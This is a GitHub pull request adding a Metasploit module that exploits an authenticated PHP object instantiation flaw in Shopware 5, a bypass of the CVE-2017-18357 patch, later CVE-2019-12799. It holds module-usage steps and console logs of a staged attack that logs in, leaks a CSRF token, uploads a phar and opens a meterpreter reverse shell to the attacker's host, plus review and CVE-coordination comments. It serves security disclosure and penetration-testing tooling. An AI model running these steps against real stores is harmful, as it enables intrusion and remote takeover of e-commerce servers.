Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Added CVE-2017 18357 - Shopware createInstanceFromNamedArguments PHP Object Instantiation #11828

Merged
merged 19 commits into from May 17, 2019

Conversation

Projects
None yet
5 participants
@stevenseeley
Copy link
Contributor

commented May 9, 2019

Background

Shopware 5 is the next generation of open source e-commerce software made in Germany. Based on bleeding edge technologies like Symfony 3, Doctrine 2 & Zend Framework Shopware comes as the perfect platform for your next e-commerce project. Furthermore Shopware 5 provides an event-driven plugin system and an advanced hook system, giving you the ability to customize every part of the platform..

In the createInstanceFromNamedArguments method, a PHP object instantiation vulnerability was discovered by @KarimOuerghemmi of RIPS who rated the bug as a CVSS 3.6 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N) due to leveraging an XXE primitive. Later on, I bypassed the whitelist patch and found an RCE primitive via PHP object injection. Note that authentication is required to exploit this vulnerability.

This vulnerability is a bypass for CVE-2017-18357 and was tested on Shopware git branches 5.6 (currently the latest), 5.5, 5.4, 5.3.

References

Notes

  • I don't consider this a zero-day because it's a bypass for a patch
  • I recommend the CVSS score to be 7.5 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N).

Setup

The following is the exact setup I used to test and analyze the vulnerability:

  • Debian GNU/Linux 9 (stretch) x64
  • MariaDB latest
  • Apache2 w/ mod rewrite / PHP 7.2.15 w/ zip, gd, ctype, curl, dom, hash, iconv, json, session, mbstring, simplexml, xml, pdo_mysql and fileinfo

For installation instructions, please refer to the Shopware installation guide.

Verification

  • Install Shopware as noted above
  • Install the Metasploit module
  • Start msfconsole
  • use exploit/multi/http/shopware_createinstancefromnamedarguments_rce
  • set payload php/meterpreter/reverse_tcp
  • set LHOST x.x.x.x
  • set RHOSTS y.y.y.y
  • check
  • exploit
  • Verify that you get a meterpreter session

Example

saturn:metasploit-framework mr_me$ ./msfconsole -qr scripts/shopware.rc 
[*] Processing scripts/shopware.rc for ERB directives.
resource (scripts/shopware.rc)> use exploit/multi/http/shopware_createinstancefromnamedarguments_rce
resource (scripts/shopware.rc)> set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
resource (scripts/shopware.rc)> set LHOST 192.168.23.1
LHOST => 192.168.23.1
resource (scripts/shopware.rc)> set RHOSTS 192.168.23.164
RHOSTS => 192.168.23.164
resource (scripts/shopware.rc)> set RPORT 8080
RPORT => 8080
resource (scripts/shopware.rc)> check
[+] 192.168.23.164:8080 - The target is vulnerable.
resource (scripts/shopware.rc)> exploit
[*] Started reverse TCP handler on 192.168.23.1:4444 
[+] Stage 1 - logged in with demo: SHOPWAREBACKEND=lpmck6d7nrh23ki2fsgeopci3p;
[+] Stage 2 - leaked the webroot: /var/www/html
[+] Stage 3 - leaked the CSRF token: SRJELMCxJfEr2RiMlqS8xmOdidI5Hr
[+] Stage 4 - generated our phar
[+] Stage 5 - uploaded phar
[+] Stage 6 - leaked phar location: media/image/6b/7e/0c/eiuzuoii.jpg
[+] Stage 7 - triggered object instantiation!
[*] Sending stage (38247 bytes) to 192.168.23.174
[*] Meterpreter session 1 opened (192.168.23.1:4444 -> 192.168.23.174:34190) at 2019-05-09 21:11:50 -0500
[+] Deleted rguktpcw.php
[+] Deleted image/6b/7e/0c/eiuzuoii.jpg

meterpreter > sysinfo
Computer    : 45835d649528
OS          : Linux 45835d649528 4.9.0-8-amd64 #1 SMP Debian 4.9.144-3.1 (2019-02-19) x86_64
Meterpreter : php/linux
meterpreter >

@bcoles bcoles added docs module labels May 9, 2019

@wchen-r7 wchen-r7 self-assigned this May 10, 2019

stevenseeley added some commits May 10, 2019

stevenseeley added some commits May 10, 2019

@wchen-r7

This comment has been minimized.

Copy link
Contributor

commented May 14, 2019

Hi, just a heads up. I'm having issues with my laptop after the Mojave upgrade, it may take a few days for me to be able to start testing this PR again. Thanks for waiting @stevenseeley !

@stevenseeley

This comment has been minimized.

Copy link
Contributor Author

commented May 14, 2019

Hi, just a heads up. I'm having issues with my laptop after the Mojave upgrade, it may take a few days for me to be able to start testing this PR again. Thanks for waiting @stevenseeley !

duuuuuude, of course, take your time!

@wchen-r7

This comment has been minimized.

Copy link
Contributor

commented May 17, 2019

I ran into a little trouble due to a bug but the exploit has been confirmed:

msf5 exploit(multi/http/shopware_createinstancefromnamedarguments_rce) > rerun
[*] Reloading module...

[*] Started reverse TCP handler on 172.16.135.1:4444 
[+] Stage 1 - logged in with demo: SHOPWAREBACKEND=1622223ihnauhu7tr6rvo77v1v;
[+] Stage 2 - leaked the web root: /var/www/html/shopware/
[+] Stage 3 - leaked the CSRF token: R5Wl0s547aP33xYEKGeW9BGYH5FVnV
[*] /var/www/html/shopware/media/xyefxbyu.php
[+] Stage 4 - generated our phar
[+] Stage 5 - uploaded phar
[+] Stage 6 - leaked phar location: media/image/6c/48/67/zkvlolae.jpg
[+] Stage 7 - triggered object instantiation!
[*] Sending stage (38247 bytes) to 172.16.135.129
[*] Meterpreter session 1 opened (172.16.135.1:4444 -> 172.16.135.129:53290) at 2019-05-17 18:12:47 -0500

meterpreter > 

I can fix that bug and then land it. Thank you for the patience @stevenseeley. Always happy to see your work!

@wchen-r7

This comment has been minimized.

Copy link
Contributor

commented May 17, 2019

Ok now this output is better:

msf5 exploit(multi/http/shopware_createinstancefromnamedarguments_rce) > run

[*] Started reverse TCP handler on 172.16.135.1:4444 
[+] Stage 1 - logged in with demo: SHOPWAREBACKEND=d66oftua6p29p6gt7pma494vbj;
[+] Stage 2 - leaked the web root: /var/www/html/shopware/
[+] Stage 3 - leaked the CSRF token: sSbbewFwfJxeCHL4JHdoqrwb88ku0w
[+] Stage 4 - generated our phar
[+] Stage 5 - uploaded phar
[+] Stage 6 - leaked phar location: media/image/5d/b2/5c/okwnopws.jpg
[+] Stage 7 - triggered object instantiation!
[*] Sending stage (38247 bytes) to 172.16.135.129
[*] Meterpreter session 2 opened (172.16.135.1:4444 -> 172.16.135.129:53296) at 2019-05-17 18:19:06 -0500
[+] Deleted hjqrkulj.php
[+] Deleted image/5d/b2/5c/okwnopws.jpg

meterpreter > 

Nothing major, it's just I had to make sure the php payload path is normalized:

php = Rex::FileUtils.normalize_unix_path("#{webroot}#{target_uri.path}media/#{@shll_bd}.php")

Landing now!

@wchen-r7 wchen-r7 merged commit 1df703b into rapid7:master May 17, 2019

2 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details

wchen-r7 added a commit that referenced this pull request May 17, 2019

@wchen-r7

This comment has been minimized.

Copy link
Contributor

commented May 17, 2019

Release Notes

Shopware 5 is the next generation of open source e-commerce software made in Germany. Based on bleeding edge technologies like Symfony 3, Doctrine 2 & Zend Framework Shopware comes as the perfect platform for your next e-commerce project. Furthermore Shopware 5 provides an event-driven plugin system and an advanced hook system, giving you the ability to customize every part of the platform..

In the createInstanceFromNamedArguments method, a PHP object instantiation vulnerability was discovered by @KarimOuerghemmi of RIPS who rated the bug as a CVSS 3.6 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N) due to leveraging an XXE primitive. Later on, I bypassed the whitelist patch and found an RCE primitive via PHP object injection. Note that authentication is required to exploit this vulnerability.

msjenkins-r7 added a commit that referenced this pull request May 17, 2019

@stevenseeley stevenseeley deleted the stevenseeley:CVE-2017-18357 branch May 17, 2019

@todb-r7

This comment has been minimized.

Copy link
Contributor

commented May 22, 2019

This vulnerability is a bypass for CVE-2017-18357

So, I had a conversation with some MITRE & CERT folks about this bug, and the consensus landed on that this does seem to describe a new vulnerability after all. Looking at rule CNT1, it's an independently fixable issue, so it looks like the old vuln and this new vuln are, from CVE's perspective, two different vulnerabilities (even though they end up hitting the same codepath). Practically speaking, someone looking at Shopware CVEs from a vuln management perspective may not know that the old patch is insufficient unless and until there's a new CVE that specifically points that out.

I'll take on wrangling that new CVE for @stevenseeley .

@stevenseeley

This comment has been minimized.

Copy link
Contributor Author

commented Jun 13, 2019

CVE-2019-12799

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.